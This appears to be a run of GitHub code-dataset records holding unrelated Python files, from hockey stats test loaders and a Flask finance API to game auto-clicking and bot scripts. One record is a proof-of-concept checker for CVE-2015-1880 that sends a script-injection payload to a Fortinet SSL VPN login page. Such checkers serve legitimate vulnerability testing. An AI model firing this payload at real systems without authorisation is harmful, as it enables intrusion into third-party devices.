skater_stats = []\n goalie_stats = []\n\n skaters = []\n goalies = []\n\n home = Team()\n home.id = GAMES[link].home.id\n away = Team()\n away.id = GAMES[link].away.id\n\n for i in GAMES[link].home.players:\n p = create_player(i)\n skaters.append(p)\n for i in GAMES[link].home.goalies:\n p = create_player(i)\n goalies.append(p)\n\n for i in GAMES[link].away.players:\n p = create_player(i)\n skaters.append(p)\n for i in GAMES[link].away.goalies:\n p = create_player(i)\n goalies.append(p)\n\n game = _create_game_stat(link)\n\n for pl in skaters:\n skater_stats.append(_get_skater_stat(game, pl))\n\n for pl in goalies:\n goalie_stats.append(_get_goalie_stat(game, pl))\n\n for i in range(0, 10):\n n = randrange(0, 20)\n pl = skaters[n]\n goal = Goal()\n goal.date = game.date\n goal.game = game\n goal.team = pl.current_team\n goal.scorer = pl\n goal.strength = 'even'\n goal.coord_x = randrange(-99, 100)\n goal.coord_y = randrange(-42, 43)\n goals.append(goal)\n\n for i in range(0, 10):\n n = randrange(0, 20)\n pl = skaters[n]\n pen = Penalty()\n pen.date = game.date\n pen.game = game\n pen.team = pl.current_team\n pen.penalty_on = pl\n pen.penalty_minutes = 2\n pen.coord_x = randrange(-99, 100)\n pen.coord_y = randrange(-42, 43)\n penalties.append(pen)\n\n return game, skater_stats, goalie_stats, penalties, goals\n","repo_name":"TimurShaykhiev/hockeystats","sub_path":"server/data_loaders/test_game_loader.py","file_name":"test_game_loader.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2495385993","text":"import sys\nimport os\n\npath = os.path.dirname(os.path.dirname(__file__))\nsys.path.append(path)\ndb_path = os.path.join(path, \"database\")\n\n\nfrom foo.public_class import Public\nfrom foo.teacher_class import Teacher\nfrom foo.student_class import Student\nfrom conf.settings import database_name\nfrom log.log_print import log_print\n\n\nclass Course(object):\n def __init__(self, course_name, course_tuition, course_cycle):\n self.course_name = course_name\n self.course_tuition = course_tuition\n self.course_cycle = course_cycle\n\n\nclass Classroom(object):\n def __init__(self, classroom_name, classroom_course, classroom_teacher):\n self.classroom_name = classroom_name\n self.classroom_course = classroom_course\n self.classroom_teacher = classroom_teacher\n\n\nclass School(Public):\n def __init__(self):\n Public.__init__(self)\n\n def create_school(self):\n \"\"\"\n 创建学校\n :return:\n \"\"\"\n school_name = input(\"school name:\")\n school_place = input(\"school place:\")\n palace_dict = {\"school place\": school_place}\n if not Public.loads_data(self, \"school\"):\n school_dict = {\"school\": {school_name: {palace_dict}}}\n Public.dumps(self, os.path.join(db_path, database_name[\"school\"]), school_dict)\n else:\n data_school_dict = Public.loads_data(self, \"school\")\n print(data_school_dict)\n data_school_dict[\"school\"].setdefault(school_name, palace_dict)\n Public.dumps(self, os.path.join(db_path, database_name[\"school\"]), data_school_dict)\n log_print(\"创建学校%s成功\" % school_name)\n\n def create_course(self):\n \"\"\"\n 创建课程\n :return:\n \"\"\"\n course_name = input(\"course name:\")\n course_tuition = input(\"course tuition:\")\n course_cycle = input(\"course cycle:\")\n c = Course(course_name, course_tuition, course_cycle)\n course_dict = {course_name: {}}\n course_dict[course_name][\"course tuition\"] = c.course_tuition\n course_dict[course_name][\"course cycle\"] = c.course_cycle\n if not Public.loads_data(self, \"course\"):\n Public.dumps(self, os.path.join(db_path, database_name[\"course\"]), course_dict)\n log_print(\"创建%s表成功\" % database_name[\"course\"])\n log_print(\"创建课程%s成功\" % course_name)\n else:\n data_course_dict = Public.loads_data(self, \"course\")\n data_course_dict.setdefault(course_name, course_dict[course_name])\n Public.dumps(self, os.path.join(db_path, database_name[\"course\"]), data_course_dict)\n log_print(\"创建课程%s成功\" % course_name)\n\n def create_classroom(self):\n \"\"\"\n 创建班级\n :return:\n \"\"\"\n classroom_name = input(\"classroom_name:\")\n classroom_course = input(\"classroom_course:\")\n classroom_teacher = input(\"classroom_teacher:\")\n classroom_dict = {classroom_name: {}}\n c = Classroom(classroom_name, classroom_course, classroom_teacher)\n classroom_dict[classroom_name][\"classroom course\"] = c.classroom_course\n classroom_dict[classroom_name][\"classroom teacher\"] = c.classroom_teacher\n if not Public.loads_data(self, \"classroom\"):\n Public.dumps(self, os.path.join(db_path, database_name[\"classroom\"]), classroom_dict)\n log_print(\"创建%s表成功\" % database_name[\"classroom\"])\n log_print(\"创建班级-%s成功\" % classroom_name)\n else:\n data_classroom_dict = Public.loads_data(self, \"classroom\")\n data_classroom_dict.setdefault(classroom_name, classroom_dict[classroom_name])\n Public.dumps(self, os.path.join(db_path, database_name[\"classroom\"]), data_classroom_dict)\n log_print(\"创建班级-%s成功\" % classroom_name)\n\n\n def create_teacher(self):\n \"\"\"\n 创建讲师\n :return:\n \"\"\"\n\n teacher_name = input(\"teacher_name:\")\n teacher_salary = input(\"teacher_salary:\")\n teacher_school = input(\"teacher_school:\")\n teacher_dict = {teacher_name: {}}\n t1 = Teacher(teacher_name, teacher_salary, teacher_school)\n teacher_dict[teacher_name][\"teacher salary\"] = t1.teacher_salary\n teacher_dict[teacher_name][\"teacher school\"] = t1.teacher_school\n if not Public.loads_data(self, \"teacher\"):\n Public.dumps(self, os.path.join(db_path, database_name[\"teacher\"]), teacher_dict)\n log_print(\"创建%s表成功\" % database_name[\"teacher\"])\n log_print(\"创建讲师%s成功\" % teacher_name)\n else:\n data_teacher_dict = Public.loads_data(self, \"teacher\")\n data_teacher_dict.setdefault(teacher_name, teacher_dict[teacher_name])\n Public.dumps(self, os.path.join(db_path, database_name[\"teacher\"]), data_teacher_dict)\n log_print(\"创建讲师%s成功\" % teacher_name)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n s = School()\n s.create_school()\n s.create_teacher()\n s.create_student()\n s.create_classroom()\n s.create_course()","repo_name":"keepAmbition/python_code","sub_path":"04.course/foo/school_class.py","file_name":"school_class.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19251363715","text":"from flask_restful import Api, Resource, marshal_with, reqparse, fields\nimport pandas as pd\n\nfrom . import rest\nfrom ...models import Brinson, db\n\n\napi = Api(rest, prefix=\"/attr\")\n\n\n@api.resource(\"/\")\nclass BrinsonViews(Resource):\n source_fields = {\n \"id\": fields.Integer,\n \"windcode\": fields.String,\n \"industry_code\": fields.String,\n \"industry_name\": fields.String,\n \"q1\": fields.Float,\n \"q2\": fields.Float,\n \"q3\": fields.Float,\n \"q4\": fields.Float,\n \"raa\": fields.Float,\n \"rss\": fields.Float,\n \"rin\": fields.Float,\n \"rto\": fields.Float,\n \"freq\": fields.String,\n \"benchmark\": fields.String,\n \"rpt_date\": fields.String\n }\n\n @marshal_with(source_fields)\n def get(self):\n args = BrinsonViews.arg_parser()\n if args is None:\n return\n windcode = args.get(\"windcode\")\n benchmark = args.get(\"benchmark\")\n freq = args.get(\"freq\")\n rpt_date = args.get(\"rpt_date\")\n if freq == \"S\":\n ret = Brinson.query.filter(\n Brinson.rpt_date == rpt_date, Brinson.freq == freq, Brinson.windcode == windcode, Brinson.benchmark == benchmark\n ).order_by(Brinson.industry_code).all()\n else:\n ret = multi_period(windcode, benchmark, rpt_date)\n print(ret)\n return ret\n\n @staticmethod\n def arg_parser():\n parser = reqparse.RequestParser()\n parser.add_argument(\"windcode\", type=str)\n parser.add_argument(\"benchmark\", type=str)\n parser.add_argument(\"freq\", type=str)\n parser.add_argument(\"rpt_date\", type=str)\n args = parser.parse_args()\n windcode = args.get(\"windcode\")\n is_in = Brinson.query.with_entities(Brinson.windcode).filter(Brinson.windcode == windcode).first()\n if not is_in:\n return\n benchmark = args.get(\"benchmark\")\n if benchmark is None:\n benchmark = \"000300.SH\"\n\n rpt_date = args.get(\"rpt_date\")\n if rpt_date is None:\n rpt_date = Brinson.query.with_entities(Brinson.rpt_date).filter(\n Brinson.windcode == windcode\n ).order_by(Brinson.rpt_date.desc()).first()[0]\n freq = \"S\"\n else:\n rpt_date = rpt_date.split(\",\")\n if len(rpt_date) == 1:\n rpt_date = rpt_date[0]\n freq = \"S\"\n else:\n freq = \"M\"\n return {\"windcode\": windcode, \"benchmark\": benchmark, \"freq\": freq, \"rpt_date\": rpt_date}\n\n\n@api.resource(\"/rpt_date\")\nclass RptDateViews(Resource):\n def get(self):\n parse = reqparse.RequestParser()\n parse.add_argument(\"windcode\", type=str)\n args = parse.parse_args()\n windcode = args.get(\"windcode\")\n is_in = Brinson.query.with_entities(Brinson.windcode).filter(Brinson.windcode == windcode).first()\n if not is_in:\n return\n dates = Brinson.query.with_entities(db.func.distinct(Brinson.rpt_date)).filter(\n Brinson.windcode == windcode, Brinson.freq == \"S\", Brinson.benchmark == \"000300.SH\"\n ).order_by(Brinson.rpt_date.desc()).all()\n dates = [x[0].strftime(\"%Y-%m-%d\") for x in dates]\n benchs = Brinson.query.with_entities(db.func.distinct(Brinson.benchmark)).filter(\n Brinson.rpt_date == dates[0], Brinson.windcode == windcode, Brinson.freq == \"S\"\n ).all()\n benchs = [x[0] for x in benchs]\n return {\"date\": dates, \"benchmark\": benchs}\n\n\ndef multi_period(windcode, benchmark, rpt_date: list):\n \"\"\"多期brinson模型\"\"\"\n b = Brinson\n data = b.query.with_entities(\n b.windcode, b.industry_name, b.industry_code, b.q1, b.q2, b.q3, b.q4, b.rpt_date, b.benchmark\n ).filter(\n b.windcode == windcode, b.freq == \"S\", b.benchmark == benchmark,\n b.rpt_date.between(rpt_date[0], rpt_date[-1])\n ).all()\n data = pd.DataFrame(data).fillna(0)\n data = data.set_index(\"industry_code\")\n for k in [\"q1\", \"q2\", \"q3\", \"q4\"]:\n data[k] = data[k] / 100 + 1\n rpts = sorted(list(set(data[\"rpt_date\"])), reverse=True)\n init = data[data[\"rpt_date\"] == rpts[0]]\n\n for rpt in rpts[1:]:\n other = data[data[\"rpt_date\"] == rpt]\n for k in [\"q1\", \"q2\", \"q3\", \"q4\"]:\n init[k] *= other[k]\n for k in [\"q1\", \"q2\", \"q3\", \"q4\"]:\n init[k] = (init[k] - 1)*100\n\n init = init.reset_index()\n init[\"rpt_date\"] = init[\"rpt_date\"].apply(lambda x: x.strftime(\"%Y-%m-%d\"))\n\n init[\"raa\"] = init[\"q2\"] - init[\"q1\"]\n init['rss'] = init[\"q3\"] - init[\"q1\"]\n init[\"rin\"] = init[\"q4\"] - init[\"q3\"] - init[\"q2\"] + init[\"q1\"]\n init[\"rto\"] = init[\"q4\"] - init[\"q1\"]\n return init.to_dict(orient=\"records\")\n\n\n@api.resource(\"/test\")\nclass MultiPeriodViews(Resource):\n def get(self):\n return multi_period()\n","repo_name":"PengchuanC/fund_back_v2","sub_path":"back_server/routes/v1/attributionviews.py","file_name":"attributionviews.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"32957543039","text":"import win32gui\nimport cv2\nimport numpy as np\nimport pyautogui\nimport time\nfrom PIL import ImageGrab \n\nWINDOW_TITLE = \"海之乐章-重启 V1.60.01A (Build:Apr 4 2023,10:50:20)\"\nTARGET_IMAGES = [\n (\"1.png\", 1, 0,0),\n (\"2.png\", 1, 0,0),\n (\"3.png\", 4, 0,0),\n (\"4.png\", 1, 0,0),\n (\"1.png\", 1, 0,0),\n (\"5.png\", 1, 0,0),\n (\"6.png\", 1, -70,12),\n (\"7.png\", 1, 0,0),\n]\nCONFIDENCE_LEVEL = 0.6\nCLICK_INTERVAL = 1\nCLICK_DURATION = 0.2\n\n\ndef capture_window(window_title):\n hwnd = win32gui.FindWindow(None, window_title)\n rect = win32gui.GetWindowRect(hwnd)\n return rect\n\n\ndef find_target(rect, target, click_times=1, deviation=0,waiting_time=0):\n time.sleep(waiting_time)\n if isinstance(target, np.ndarray):\n image = target\n else:\n image = cv2.imread(target, cv2.IMREAD_COLOR)\n\n result = pyautogui.locateCenterOnScreen(image, confidence=CONFIDENCE_LEVEL, region=rect)\n if result is not None:\n try:\n pyautogui.click(\n x=result.x + deviation,\n y=result.y + deviation,\n clicks=click_times,\n interval=CLICK_INTERVAL,\n duration=CLICK_DURATION,\n button=\"left\",\n )\n except pyautogui.FailSafeException as e:\n print(e)\n else:\n print(f\"未找到匹配图片 {target},0.1秒后重试\")\n time.sleep(0.1)\n\nfrom PIL import ImageGrab\n\n\ndef find_pixel_location(color, region=None):\n im = ImageGrab.grab()\n width, height = im.size\n if region is None:\n region = (0, 0, width, height)\n for x in range(region[0], region[2]):\n for y in range(region[1], region[3]):\n if im.getpixel((x, y)) == color:\n return (x, y)\n return None\n\n\nif __name__ == \"__main__\":\n # with ImageGrab.grab() as _:\n # window_rect = capture_window(WINDOW_TITLE)\n color=(185,227,117)\n regin=find_pixel_location(color)\n if regin is not None:\n pyautogui.moveTo(regin)\n pyautogui.click()\n else:\n print('未找到') \n # for target_image, click_times, deviation,waiting_time in TARGET_IMAGES:\n # find_target(window_rect, target_image, click_times, deviation , waiting_time)\n","repo_name":"chongwen2012/sea","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26836722485","text":"import cv2\r\nimport os\r\nimport sys\r\nsys.path.append('../packages/rectify/')\r\nimport imutils as imu\r\nfrom right import remedy\r\nfrom rectify_hough import correct_skew2\r\n\r\n\r\ndef hough_angle(imageDir,imageSaveDir):\r\n imagePathList = os.listdir(imageDir)\r\n #imagePathList=['120190703153927345.jpg']\r\n\r\n for i in range(0, len(imagePathList)):\r\n imagePath = os.path.join(imageDir, imagePathList[i])\r\n print(imagePath)\r\n img = cv2.imread(imagePath)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n rotated, angle = correct_skew2(img, gray)\r\n corrected = remedy(rotated)\r\n # imu.imshow_(corrected)\r\n cv2.imwrite(os.path.join(imageSaveDir,imagePathList[i]),corrected)\r\n\r\n\r\ndef rectify(img):\r\n if isinstance (img, str):\r\n img = cv2.imread(img)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n rotated, angle = correct_skew2(img, gray)\r\n corrected = remedy(rotated)\r\n return corrected\r\n\r\nif __name__ == '__main__':\r\n # imageDir='F:/exam_dataset/waibu/waibu-liangdiangeili'\r\n imageDir = '../../math'\r\n\r\n # imageSaveDir = 'F:/exam/result/hough_angle/abc'\r\n imageSaveDir = '../../math-adjust'\r\n\r\n hough_angle(imageDir,imageSaveDir)","repo_name":"Tegrisco/testpaper-stage2","sub_path":"packages/rectify/hough_angle.py","file_name":"hough_angle.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8646743431","text":"\"\"\"\n This type of algorithm have two obligatory functions:\n\n *initial_allocation*: invoked at the start of the simulation\n\n *run* invoked according to the assigned temporal distribution.\n\n\"\"\"\n\nfrom yafs.placement import Placement\n\nclass CloudPlacement(Placement):\n \"\"\"\n This implementation locates the services of the application in the cheapest cloud regardless of where the sources or sinks are located.\n\n It only runs once, in the initialization.\n\n \"\"\"\n def initial_allocation(self, sim, app_name):\n #We find the ID-nodo/resource\n value = {\"mytag\": \"cloud\"} # or whatever tag\n\n id_cluster = sim.topology.find_IDs(value)\n app = sim.apps[app_name]\n services = app.services\n\n for module in services:\n if module in self.scaleServices:\n for rep in range(0, self.scaleServices[module]):\n idDES = sim.deploy_module(app_name,module,services[module],id_cluster)\n\n #end function\n\n\n\n\n","repo_name":"acsicuib/YAFS","sub_path":"examples/Tutorial/simplePlacement.py","file_name":"simplePlacement.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"} +{"seq_id":"16862923342","text":"# Question: https://leetcode.com/problems/container-with-most-water/\n\n# Solution:\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n # Function to calculate area: Minimum height, max width\n def getArea(self, left, right):\n x = abs(right-left)\n y = min(height[left], height[right])\n return x*y\n \n n = len(height)\n left, right = 0, n-1\n area = 0\n while left < right:\n area = max(area, getArea(height, left, right))\n if height[left] > height[right]:\n right -= 1\n else:\n left += 1\n return area\n\n# Verdict:\n# Runtime: 740 ms, faster than 66.18% of Python3 online submissions for Container With Most Water.\n# Memory Usage: 27.6 MB, less than 22.10% of Python3 online submissions for Container With Most Water.\n","repo_name":"Dexterzprotege/LeetCode-Blind75","sub_path":"04ContainerWithMostWater.py","file_name":"04ContainerWithMostWater.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23588321461","text":"# Instalar esto pip install pyautogui\n# X = X^2 (Se toman la poscion de 3-6) Teniendo que poseer 8 posiciones obligatoriamente\n# Semilla de 4 digitos\n\nimport pyautogui\nfrom datetime import datetime\n\ndef get_mouse_seed():\n # Obtener la posición actual del ratón\n x, y = pyautogui.position()\n\n # Convertir las coordenadas x e y en un número entero utilizando la función hash()\n seed = hash((x, y))\n\n # Devolver la semilla generada a partir de las coordenadas del ratón\n return seed\n\ndef validar_semilla(semilla): # Validar tamaño de semilla\n if semilla <= 9999:\n return semilla\n else:\n semilla_acortada = str(semilla)[:4]\n return int(semilla_acortada)\n\n\ndef validar_numAleatorio(num_aleatorio):\n x = str(num_aleatorio)\n while len(x) < 8: \n x = \"1\" + x \n return x\n\n\ndef von_Neumann(semilla, cantidad):\n lista = []\n x = semilla\n for i in range(cantidad):\n x = x ** 2\n valor_ale= validar_numAleatorio(x)\n x = int(valor_ale[2:6])\n lista.append(x)\n return lista\n\n\nsemilla = get_mouse_seed()\n#semilla = datetime.now().timestamp()\ncantidad = int(input(\"Ingrese la cantidad de numeros pseudoaleatorios que necesita: \"))\nsemilla = validar_semilla(semilla)\ngenerator = von_Neumann(semilla, cantidad)\n\nprint(\"Tabla de números pseudoaleatorios generados:\")\nprint(\"------------------------------\")\nprint(\"| Índice | Valor |\")\nprint(\"------------------------------\")\nfor i in range(len(generator)):\n print(f\"| {i+1} | {generator[i]} |\")\nprint(\"------------------------------\")\n","repo_name":"sebadiko/NumerosPseoudoaleatorios","sub_path":"metodoVN.py","file_name":"metodoVN.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14349500455","text":"import sys\nimport os\nsys.path.insert(0, os.path.join(\n os.path.dirname(os.path.realpath(__file__)), '..'))\n\nfrom crnpy.crn import CRN, from_react_strings\n\nfrom simulation import simulate, plot_simulation\n\n__author__ = \"Elisa Tonello\"\n__copyright__ = \"Copyright (c) 2016, Elisa Tonello\"\n__license__ = \"BSD\"\n__version__ = \"0.0.1\"\n\n\nif __name__ == \"__main__\":\n # Simulation of one-substrate enzyme kinetics,\n # before and after removal of the intermediate via qss.\n\n crn = from_react_strings(['s + e (k_1)<->(k1) es', 'es ->(k2) p + e'])\n\n start_t, end_t, incr = 0, 1, 0.01\n initial = {'s': 5, 'e': 3, 'es': 0, 'p': 0}\n params = {'comp': 1, 'k1': 15, 'k_1': 10, 'k2': 6}\n\n colors = {'s': 'darkgreen', 'e': 'red', 'es': 'yellow', 'p': 'blue'}\n\n data, t = simulate(crn, params, initial, start_t, end_t, incr)\n title = \"One-substrate enzyme kinetics\\n $k_{1} = %s$, $k_{-1} = %s$, $k_{2} = %s$\"%\\\n (params['k1'], params['k_1'], params['k2'])\n plot_simulation(\"one-sub_enzyme_plt.png\", data, t, colors, title)\n\n crn.qss('es')\n\n data, t = simulate(crn, params, initial, start_t, end_t, incr)\n title = \"One-substrate enzyme kinetics, after qss reduction\\n $k_{1} = %s$, $k_{-1} = %s$, $k_{2} = %s$\"%\\\n (params['k1'], params['k_1'], params['k2'])\n plot_simulation(\"one-sub_enzyme_reduced_plt.png\", data, t, colors, title)\n","repo_name":"etonello/crnpy","sub_path":"examples/simulation_one-sub_enzyme.py","file_name":"simulation_one-sub_enzyme.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"656598767","text":"import requests\n\n\n# Vuln Base Info\ndef info():\n return {\n \"author\": \"cckuailong\",\n \"name\": '''XSS in Fortigates SSL VPN login page''',\n \"description\": '''Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.''',\n \"severity\": \"medium\",\n \"references\": [\n \"https://nvd.nist.gov/vuln/detail/CVE-2015-1880\", \n \"https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page\"\n ],\n \"classification\": {\n \"cvss-metrics\": \"\",\n \"cvss-score\": \"\",\n \"cve-id\": \"\",\n \"cwe-id\": \"\"\n },\n \"metadata\":{\n \"vuln-target\": \"\",\n \n },\n \"tags\": [\"cve\", \"cve2015\", \"xss\", \"fortigates\", \"ssl\"],\n }\n\n\n# Vender Fingerprint\ndef fingerprint(url):\n return True\n\n# Proof of Concept\ndef poc(url):\n result = {}\n try:\n url = format_url(url)\n path = \"/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en\"\n\n resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)\n if resp.status_code == 200 and \"\" in resp.text and \"text/html\" in str(resp.headers):\n result[\"success\"] = True\n result[\"info\"] = info()\n result[\"payload\"] = url+path\n\n except:\n result[\"success\"] = False\n \n return result\n\n\n# Exploit, can be same with poc()\ndef exp(url):\n return poc(url)\n\n\n# Utils\ndef format_url(url):\n url = url.strip()\n if not ( url.startswith('http://') or url.startswith('https://') ):\n url = 'http://' + url\n url = url.rstrip('/')\n\n return url","repo_name":"cckuailong/reapoc","sub_path":"2015/CVE-2015-1880/poc/pocsploit/CVE-2015-1880.py","file_name":"CVE-2015-1880.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":641,"dataset":"github-code","pt":"78"} +{"seq_id":"39178754528","text":"import numpy as np\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\ndef sigmoid_grad(x):\n return (1.0 - sigmoid(x)) * sigmoid(x)\n\ndef softmax(x):\n if x.ndim == 2:\n return softmax_2D(x)\n else:\n return softmax_1D(x)\n\ndef softmax_1D(x):\n c = np.max(x)\n exp_a = np.exp(x - c) # avoid overflow\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n\n return y\n\ndef softmax_2D(x):\n x = x.T\n x = x - np.max(x, axis=0)\n y = np.exp(x) / np.sum(np.exp(x), axis=0)\n return y.T\n\ndef cross_entropy_error(y, t):\n if y.ndim == 1:\n y = y.reshape(1, y.size)\n t = t.reshape(1, t.size)\n\n if t.size == y.size:\n t = t.argmax(axis=1)\n\n batch_size = y.shape[0]\n delta = 1e-7\n\n # yの各ベクトルについて、正解ラベルのインデックスにある要素を取り出す\n biggests_in_y = y[np.arange(batch_size), t]\n\n return -1 * np.sum(np.log(biggests_in_y + delta)) / batch_size","repo_name":"PandaDrunkard/deep-learning-from-scratch","sub_path":"common/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18775150260","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport time # check framerate\n\nfrom typing import Union\n\n\n'''\nCriando um módulo de tudo que aprendemos, para que não seja necessário repetir toooodo esse código quando formos usar\nUtilizaremos apenas requisições\n'''\n\n# Tipagem =================\n'''\nType Hints podem ser usadas por ferramentas como IDEs e verificadores de tipo para fornecer informações adicionais sobre o código.\n Por exemplo, uma IDE pode usar Type Hints para fornecer sugestões de código e verificar se você está usando o tipo correto de dados em uma variável.\nType Hints podem ser usadas para documentar o código. Isso pode ser útil se você estiver trabalhando em um projeto com várias pessoas, \n pois permite que você especifique o tipo de dados que uma variável deve conter.\nType Hints podem ser usadas para verificar se o código está usando o tipo correto de dados em uma variável. Isso pode ser útil para encontrar \n erros de digitação ou erros de lógica que podem ser difíceis de encontrar em tempo de execução.\nType Hints podem ser usadas para otimizar o código em tempo de execução. Por exemplo, se você usar Type Hints para especificar que uma variável contém um número inteiro, \n o interpretador Python pode usar uma implementação mais rápida de operações matemáticas em vez de uma implementação genérica que funciona com qualquer tipo de dados.\n'''\nwebcam_image = np.ndarray\nconfidence = float\ncoords_vector = Union[int, list[int]]\nrgb_tuple = tuple[int, int, int]\n# =========================\n\n\n# Class ===================\nclass VanzeDetector():\n def __init__(self, \n mode: bool = False, \n number_hands: int = 2, \n model_complexity: int = 1,\n min_detec_confidence: confidence = 0.5, \n min_tracking_confidence: confidence = 0.5\n ):\n \n # Parametros necessário para inicializar o hands -> solução do mediapipe\n self.mode = mode\n self.max_num_hands = number_hands\n self.complexity = model_complexity\n self.detection_con = min_detec_confidence\n self.tracking_con = min_tracking_confidence\n\n # Inicializando o hands\n self.mp_hands = mp.solutions.hands\n self.hands = self.mp_hands.Hands(self.mode,\n self.max_num_hands,\n self.complexity,\n self.detection_con,\n self.tracking_con) \n self.mp_draw = mp.solutions.drawing_utils\n self.tip_ids = [4, 8, 12, 16, 20]\n\n def find_hands(self, \n img: webcam_image, \n draw_hands: bool = True):\n # Correção de cor\n img_RGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # Coletando resultados do processo das hands e analisando-os\n self.results = self.hands.process(img_RGB)\n if self.results.multi_hand_landmarks:\n for hand in self.results.multi_hand_landmarks:\n if draw_hands:\n self.mp_draw.draw_landmarks(img, hand, self.mp_hands.HAND_CONNECTIONS) \n\n return img\n\n def find_position(self, \n img: webcam_image, \n hand_number: int = 0, \n draw_hands: bool = True):\n self.required_landmark_list = []\n \n if self.results.multi_hand_landmarks:\n my_hand = self.results.multi_hand_landmarks[hand_number]\n for id, lm in enumerate(my_hand.landmark):\n height, width, channels = img.shape\n center_x, center_y = int(lm.x*width), int(lm.y*height)\n\n self.required_landmark_list.append([id, center_x, center_y]) \n\n # if draw_hands:\n # # if id==8:\n # cv2.circle(img, (center_x, center_y), 10, (255, 0, 0), cv2.FILLED)\n\n return self.required_landmark_list\n\n def fingers_up(self):\n '''\n Para essa função devemos examinar a ponta do dedo do dedo que queremos verificar, para dar o veredito se ele está levantado ou não\n Para isso, vamos analisar sempre a ponta do dedo e dois landmarks abaixo deste. Como por exemplo:\n Se quero saber se o dedo indicador está pra cima, devo analisar o eixo y do LM 8 e do LM 6. Se o y_8 > y_6, significa que o dedo está levantado,\n caso contrário, não está.\n O conceito se repete para todos os outros dedos.\n '''\n fingers = []\n\n # dedão - analisado diferente por que o dedão se comporta de maneira diferente. Não desce no eixo y que nem os outros dedos\n if self.required_landmark_list[self.tip_ids[0]][1] > self.required_landmark_list[self.tip_ids[0] - 1][1]: fingers.append(1)\n else: fingers.append(0)\n\n # Para os outros 4 dedos\n for id in range(1, 5):\n if self.required_landmark_list[self.tip_ids[id]][2] < self.required_landmark_list[self.tip_ids[id] - 2][2]: fingers.append(1)\n else: fingers.append(0)\n\n return fingers\n\n def draw_in_position(self,\n img: webcam_image,\n x_vector: coords_vector, \n y_vector: coords_vector,\n rgb_selection: rgb_tuple = (255, 0, 0),\n thickness: int = 10):\n x_vector = x_vector if type(x_vector) == list else [x_vector]\n y_vector = y_vector if type(y_vector) == list else [y_vector]\n\n for x, y in zip(x_vector, y_vector):\n cv2.circle(img, (x, y), thickness, rgb_selection, cv2.FILLED)\n\n return img\n \n# Main ==================== para teste de classe\ndef main():\n # coletando o framerate e capturando o vídeo\n previous_time = 0\n current_time = 0\n capture = cv2.VideoCapture(0)\n\n Vanze = VanzeDetector()\n\n while True:\n success, img = capture.read()\n \n img = Vanze.find_hands(img) #, draw_hands=False)\n landmark_list = Vanze.find_position(img) #, draw_hands=False)\n if landmark_list:\n print(landmark_list[8])\n\n current_time = time.time()\n fps = 1/(current_time - previous_time)\n previous_time = current_time\n\n cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_DUPLEX, 2, (255,0,255), 3)\n # cv2.putText(material, texto, localização, fonte, fontScale, cor, thickness)\n\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\nif __name__ == '__main__':\n main()\n","repo_name":"RodrigoVanzelotti/hand_tracking_volume_gesture","sub_path":"hand_tracking_module.py","file_name":"hand_tracking_module.py","file_ext":"py","file_size_in_byte":6664,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4288477989","text":"import csv\n\n# pertama, kita buat dict keyword, yg berisi keyword yang\n# umum seperti info-beasiswa atau yang-dibawa-ospek.\n\nkeyword = {}\n\nwith open('datacsv/umum.csv',newline='') as csvfile: # delimiternya '|', karena ini jarang dipakai\n baris = csv.reader(csvfile,delimiter='|') # kalau ','... bisa jadi hancur.\n temp = []\n for x in baris: # intinya, sekarang isi ultah_csv\n temp.append(x) \t\t\t\t# ada di variabel temp\n\nkeyword = {temp[i][0]:temp[i][1] for i in range(len(temp))} # ubah temp (tipe list) jadi keyword (tipe dict)\n\ndef cek_umum(Input,keyword=keyword):\n if Input in Input in keyword:\n return(True) # Inputnya ada di keyword kategori umum, alias disini\n else:\n return(False)\ndef keyword_umum(Input, keyword=keyword):\n return(keyword[Input])\n","repo_name":"Rubiguu/line-bot-fmipa-rubio-experiment","sub_path":"keyword_umum.py","file_name":"keyword_umum.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29413026880","text":"import 